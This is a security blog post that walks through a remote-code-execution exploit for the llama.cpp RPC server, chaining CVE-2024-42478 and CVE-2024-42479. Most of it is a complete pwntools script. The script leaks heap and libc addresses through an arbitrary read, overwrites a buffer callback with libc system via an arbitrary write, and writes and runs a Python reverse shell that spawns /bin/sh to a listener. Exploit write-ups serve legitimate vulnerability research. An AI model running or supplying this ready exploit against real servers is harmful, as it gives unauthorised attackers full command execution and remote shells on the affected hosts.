Pwning LLaMA.cpp RPC Server

 Date: October 3, 2024

Hello world, and Shana Tova :D

I took the last few days to develop an RCE exploit by leveraging CVE-2024-42478(arb read) and CVE-2024-42479(arb write).

Note: For a more detailed version of the exploit-dev process, see https://youtu.be/OJs1-zm0AqU

The bugs

The bugs are pretty documented in the GitHub advisory GHSA-5vm9-p64x-gqw9 and GHSA-wcr5-566p-9cwj. They are pretty trivial, but fun to exploit :D

Achieving RCE

To achieve RCE, i overwrote one of the callbacks of ggml_backend_buffer::iface:

    struct ggml_backend_buffer_i {
        const char * (*GGML_CALL get_name)   (ggml_backend_buffer_t buffer);
        void         (*GGML_CALL free_buffer)(ggml_backend_buffer_t buffer);
        void *       (*GGML_CALL get_base)   (ggml_backend_buffer_t buffer);
        void         (*GGML_CALL init_tensor)(ggml_backend_buffer_t buffer, struct ggml_tensor * tensor);
        void         (*GGML_CALL set_tensor) (ggml_backend_buffer_t buffer,       struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
        void         (*GGML_CALL get_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * tensor,       void * data, size_t offset, size_t size);
        bool         (*GGML_CALL cpy_tensor) (ggml_backend_buffer_t buffer, const struct ggml_tensor * src, struct ggml_tensor * dst); // dst is in the buffer, src may be in any buffer
        void         (*GGML_CALL clear)      (ggml_backend_buffer_t buffer, uint8_t value);
        void         (*GGML_CALL reset)      (ggml_backend_buffer_t buffer); // reset any internal state due to tensor initialization, such as tensor extras
    };

    struct ggml_backend_buffer {
        struct ggml_backend_buffer_i  iface;
        ggml_backend_buffer_type_t    buft;
        ggml_backend_buffer_context_t context;
        size_t size;
        enum ggml_backend_buffer_usage usage;
    };

This is triggered every time the client sends a GET_TENSOR command:

b3560/ggml/src/ggml-backend.c#L246:

GGML_CALL void ggml_backend_tensor_get(const struct ggml_tensor * tensor, void * data, size_t offset, size_t size) {
    ggml_backend_buffer_t buf = tensor->view_src ? tensor->view_src->buffer : tensor->buffer;

    GGML_ASSERT(buf != NULL && "tensor buffer not set");
    GGML_ASSERT(tensor->data != NULL && "tensor not allocated");
    GGML_ASSERT(offset + size <= ggml_nbytes(tensor) && "tensor read out of bounds");

    if (!size) {
        return;
    }

    buf->iface.get_tensor(buf, tensor, data, offset, size); // <---- here
}

exp.py

Full exploit is below:

#!/usr/bin/env python3
from pwn import *
IP = 'localhost'
PORT = 50052
REVERSE_SHELL_IP = '127.0.0.1'
REVERSE_SHELL_PORT = 4242
CMD = f'''python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{REVERSE_SHELL_IP}",{REVERSE_SHELL_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' '''


'''
1 byte	|	8 bytes		|    ...
cmd     |	msg size	|  msg data
'''

# cmds
ALLOC_BUFFER = 0
SET_TENSOR   = 6
GET_TENSOR   = 7

# utils
def send_cmd(io: remote, cmd: int, buf: bytes):
    packet = b''
    packet += p8(cmd)       # cmd, 1 byte
    packet += p64(len(buf)) # msg size, 8 bytes
    packet += buf           # content, size of the buffer you want to allocate
    io.send(packet)

def alloc_buf(io: remote, size: int) -> int:
    send_cmd(io, ALLOC_BUFFER, p64(size))
    resp = io.recv(1024)

    heap_leak = u64(resp[0x8:0x10])
    return heap_leak

def arb_read(io: remote, target_addr: int, valid_addr: int) -> int:
    # sizeof msg = 0x138    ->     ( sizeof(rpc_tensor) + 2*sizeof(uint64_t) )
    # serialization format: | rpc_tensor | offset (8 bytes) | size (8 bytes) |
    tensor = flat( {
        0x8:   p32(28), # type
        12:    p64(valid_addr), # buffer
        0x18:    p32(0x41414141)*8,
        0xe0:  p32(target_addr >> 32), # data remote ptr

        0x128: p64(target_addr & 0x00000000ffffffff), # offset
        0x130: p64(0x130) # size
    }, filler = b'\x00', length=0x138)

    send_cmd(io, GET_TENSOR, tensor)
    resp = io.recv(1024)
    return u64(resp[0x8:0x10])

def arb_write(io: remote, target_addr: int, valid_addr: int, what: bytes) -> int:
    # serialization format: | rpc_tensor | offset (8 bytes) | data (size bytes) |
    tensor = flat( {
        0x8:   p32(28), # type
        12:    p64(valid_addr), # buffer
        0x18:    p32(0x41414141)*8,
        0xe0:  p32(target_addr >> 32), # data remote ptr

        0x128: p64(target_addr & 0x00000000ffffffff), # offset
        0x130: what  # payload
    }, filler = b'\x00', length=0x140)

    send_cmd(io, SET_TENSOR, tensor)
    # resp = io.recv(1024)
    return 0

def trigger_plt() -> None:
    io = remote(IP, PORT)
    alloc_buf(io, 0x140)
    io.close()

def exec_cmd(io: remote, cmd: str) -> None:
    with log.progress('Executing command') as p:
        # clear file
        arb_write(io, heap_leak, heap_leak, f'echo "">x\x00'.encode())
        arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system)) # void         (*GGML_CALL set_tensor) (ggml_backend_buffer_t buffer,       struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
        arb_read(io, 0xdeadbeefcafebabe, heap_leak) # call get_tensor to trigger the `jmp rax` 

        # write chars
        for c in cmd:
            p.status(f'Writing {c}')
            if c == '"':
                c = '\\"'
            arb_write(io, heap_leak, heap_leak, f'echo -n "{c}">>x\x00'.encode())
            arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system)) # void         (*GGML_CALL set_tensor) (ggml_backend_buffer_t buffer,       struct ggml_tensor * tensor, const void * data, size_t offset, size_t size);
            arb_read(io, 0xdeadbeefcafebabe, heap_leak) # call get_tensor to trigger the `jmp rax` 
        
        # exec command
        arb_write(io, heap_leak, heap_leak, b'sh ./x\x00')
        arb_write(io, heap_leak+0x28, heap_leak, p64(libc_system))
        arb_read(io, 0xdeadbeefcafebabe, heap_leak)
    return None

if __name__ == '__main__':
    trigger_plt() # make sure the puts addr is getting resolved
    io = remote(IP, PORT)
    heap_leak = alloc_buf(io, 0x140)
    log.info(f'heap_leak = {hex(heap_leak)}')

    set_tensor_addr = arb_read(io, heap_leak+0x20, heap_leak)
    libggml_base = set_tensor_addr - 0x776d0
    log.info(f'set_tensor_addr = {hex(set_tensor_addr)}')
    log.info(f'libggml_base = {hex(libggml_base)}')

    puts_got_offset = 0x105708
    puts_libc_offset = 0x80e50

    libc_got_puts = arb_read(io, libggml_base+puts_got_offset, heap_leak)
    libc_base = libc_got_puts - puts_libc_offset
    libc_system = libc_base + 0x50d70
    log.info(f'libc_got_puts = {hex(libc_got_puts)}')
    log.info(f'libc_base = {hex(libc_base)}')
    log.info(f'libc_system = {hex(libc_system)}')
    
    exec_cmd(io, CMD)
    log.success('If we reached here without exception, we have a reverse shell :^)')
    # import os
    # os.system('nc -lvp 4242')
    # io.interactive()

'''
// ggml_tensor is serialized into rpc_tensor
#pragma pack(push, 1)
struct rpc_tensor {
    uint64_t id;            0
    uint32_t type;          8
    uint64_t buffer;        12
    uint32_t ne[GGML_MAX_DIMS]; 20
    uint32_t nb[GGML_MAX_DIMS];
    uint32_t op;
    int32_t  op_params[GGML_MAX_OP_PARAMS / sizeof(int32_t)];
    int32_t  flags;
    uint64_t src[GGML_MAX_SRC];
    uint64_t view_src;
    uint64_t view_offs;
    uint64_t data;
    char name[GGML_MAX_NAME];

    char padding[4];
};
'''

Output:

solve.gif

 Tags:  llama-cpp pwn CVE-2024-42478 CVE-2024-42479

Previous
⏪ Reverse Engineering a Kernel Driver chall